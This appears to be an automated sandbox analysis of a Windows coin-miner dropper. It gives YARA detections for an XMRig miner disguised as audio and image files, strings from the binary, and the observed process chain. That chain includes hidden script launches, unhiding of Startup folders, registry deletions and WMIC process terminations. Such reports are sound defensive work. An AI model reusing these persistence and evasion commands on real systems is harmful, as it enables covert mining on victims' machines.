                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: 00000000.00000003.2159430929.0000000002EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: 00000000.00000000.2137379711.0000000000789000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: Process Memory Space: K4gsPJGEi4.exe PID: 3652, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: C:\Users\Public\RtkAudio.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                            Source: WinRing0x64.txt.0.drBinary string: \Device\WinRing0_1_2_0
                            Source: classification engineClassification label: mal100.evad.mine.winEXE@259/88@2/0
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_0040E395 CreateToolhelp32Snapshot,memset,Process32First,OpenProcess,memset,GetModuleHandleA,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32Next,CloseHandle,18_2_0040E395
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d.txtJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile created: C:\Users\user\AppData\Local\Temp\screen.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs"
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%Systemfont.exe%'
                            Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%IntelSvc.exe%'
                            Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%Systemfont.exe%'
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="RtkAudio.exe")
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%RtkAudio.exe%'
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%IntelSvc.exe%'
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%Systemfont.exe%'
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%palemoon.exe%'
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%screen.exe%'
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : \\user-PC\ROOT\CIMV2:Win32_Process.Handle="4772"::Terminate
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%choice.exe%'
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%fontdrvhots.exe%'
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process WHERE name like '%tv_x86.exe%'
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: K4gsPJGEi4.exeString found in binary or memory: "-install_service" has no effect if running not under administrator rights
                            Source: K4gsPJGEi4.exeString found in binary or memory: .exe\USOSharedUSOSharedpathCan't download temporary exe {}update_get_tempCan't open temporary exe {}update_open_tempCan't open loaded file {}update_get_temp_sizeLoading new executable from disk {}update_read_tempError decompressing memory.update_decompressCan't write decompressed dataupdate_write_decompressCan't open uncompressed fileupdate_open_temp2\updaterupdaterCan't download updater {}update_get_updaterCan't open updater {}update_open_updaterCan't get updater file size {}update_get_updater_sizeLoading updater from disk {}update_read_updaterError decompressing updater memory.update_decompress_updaterCan't write decompressed updaterupdate_write_updaterCan't create decompressed updater {}update_open_decompressed_updater" -cur_rights -install_service Stopping and removing serviceupdateStopping and/or removing serviceservice_stopcountservice terminated with {}argsStarted with {}fromInterfaceExecuting - rolling back update stateupdate_rollbackrec_txt_startedmw_btn_screenrecord_stopmw_btn_screenrecord_startrec_txt_stoppedrec_txt_failedbtn_okIntelSvcLocalIPB- Missing argument parameter: integer value is not an integerArgument floating point value is not a float valueunsigned integertruefalse must be 0/1/false/truew watchdog service with {}elevaterun_as_admin{}, Removing service-sid s start service as {}Removing serviceCan't run or install service {}elevate_servicez -service -install_service z CONOUT$terminalinstall_servicew{}, Stopping, removing and installing servicemainService installed as watchdogCan't start serviceservice_startService installationservice_install"-install_service" has no effect if running not under administrator rightsdsRunning as elevatorrunnerRunning as watchdog sericewatchdogcRunning as cad-simulatorcadaRunning by servicemode{}The app is already running.. exitingCan't elevate processcant_elevateStartbuild IntelSvc {}adminbuildmajorminorservice_packplatformidsuitetypeWindows {}, {}, {}, {}, {}, {}, {}windowslanguageEnvironment {}envsessidselectedrestartupdatedboot_modeadminserviceLaunch parameters: {}, {}, {}, {}, {}, {}, as {}, is running {}paramsWow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionbcdedit.exe/deletevalue safebootCan't run BCDEdit for clearing boot moderegistering tray window classreg_tray_wnd_classmenu_servicetray_tipRunning with no UIno_uichannelCan't create interprocess communication {}create_ipcExit, 0xGUI objects {}gui_objsminutesSpentpartnCountpartnCountLimWarnpartnCountSuspWarnpartnCountLimtimeLimWarntimeLimSuspWarntimeLimprlSesLimOutprlSesLimInfileTransfermsg1IntervalshowPPAfterSessionautoUpdatedownloadSA_CLOSEbtn_cancelupdate_requestbtn_update_noneed_okupdate_noneedSave ID to fileid.txtCan't create/open file id.txtidtxt_openidrightsAdmin wnd: {}, {}.: ID 8.8.8.8sa_ipsa_portrouter_iprouter_portproxy_ipproxy_port(la
                            Source: K4gsPJGEi4.exeString found in binary or memory: L`ZDlefteditsettings_proxy_passwordfullrightsettings_btn_cancelsettings_btn_okinfoback_settingssettings_contacts_set_default_pathsettings_contacts_pathsettings_fmpathsettings_tab4settings_use_pinsessnotification_minimizedsettings_adminsettings_cb_minsettings_autosetvideomodesettings_cb_cursorsettings_cb_backsettings_tab2settings_cb_autosettings_fpssettings_showremotecursorsettings_autojoinfullscreensettings_txt_rec_infosettings_ffmpeg_pathsettings_tab5settings_qualitysettings_cb_show_btnrec_mwsettings_cb_auto_start_recordingsettings_recording_default_path_videosettings_recording_path_videosettings_cb_proxysettings_tab1settings_recording_qualitysettings_recording_frameratesettings_auth_serversettings_proxy_usersettings_proxy_portsettings_proxy_ipsettings_out_portsettings_direct_ip_connsettings_auth_portsettings_auth_ipsettings_listen_porthttps://www.Microsoft.com/ref/screen-recorder-installation\USOShared\Recordings\\USOShared\
                            Source: K4gsPJGEi4.exeString found in binary or memory: /stop
                            Source: K4gsPJGEi4.exeString found in binary or memory: /stop
                            Source: K4gsPJGEi4.exeString found in binary or memory: /stop_code
                            Source: K4gsPJGEi4.exeString found in binary or memory: /stop_code
                            Source: K4gsPJGEi4.exeString found in binary or memory: --help
                            Source: K4gsPJGEi4.exeString found in binary or memory: --help
                            Source: K4gsPJGEi4.exeString found in binary or memory: -h, --help display this help and exit
                            Source: K4gsPJGEi4.exeString found in binary or memory: -h, --help display this help and exit
                            Source: K4gsPJGEi4.exeString found in binary or memory: a:c:kBp:Px:r:R:s:t:T:o:u:O:v:l:Sx:RtkAudio-h--help-V--version--versions--export-topology--print-platformsUsage: xmrig [OPTIONS]
                            Source: K4gsPJGEi4.exeString found in binary or memory: a:c:kBp:Px:r:R:s:t:T:o:u:O:v:l:Sx:RtkAudio-h--help-V--version--versions--export-topology--print-platformsUsage: xmrig [OPTIONS]
                            Source: K4gsPJGEi4.exeString found in binary or memory: if(p-start_p>size_limit)
                            Source: K4gsPJGEi4.exeString found in binary or memory: id-cmc-addExtensions
                            Source: K4gsPJGEi4.exeString found in binary or memory: set-addPolicy
                            Source: K4gsPJGEi4.exeString found in binary or memory: crypto/store/loader_file.c
                            Source: K4gsPJGEi4.exeString found in binary or memory: crypto/store/loader_file.cpass phrasePRIVATE KEYPUBLIC KEYPARAMETERSX509 CRLTRUSTED CERTIFICATEX509 CERTIFICATECERTIFICATEENCRYPTED PRIVATE KEYPKCS8 decrypt passwordPKCS12 import passwordfile:localhost/rb-----BEGIN %08lx/PEM'PEM type is 'file`q_@
                            Source: unknownProcess created: C:\Users\user\Desktop\K4gsPJGEi4.exe "C:\Users\user\Desktop\K4gsPJGEi4.exe"
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Start.cmd" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe C:\Windows\System32\find.exe "0x0"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
                            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\est1.cmd"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c type "C:\Users\user\AppData\Local\Temp\Start.cmd"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Vnoad.vbs"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
                            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\two.cmd"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user\AppData\Local\Temp" 2>NUL"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"Local"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\user" 2>NUL"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe C:\Windows\System32\findstr.exe /i /c:"'"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screen.exe "C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "cod2"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKCU\Software\Microsoft\Windows"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\*.*"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /f /reg:64
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i /c:"RtkAudio"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%RtkAudio.exe%'" Call Terminate
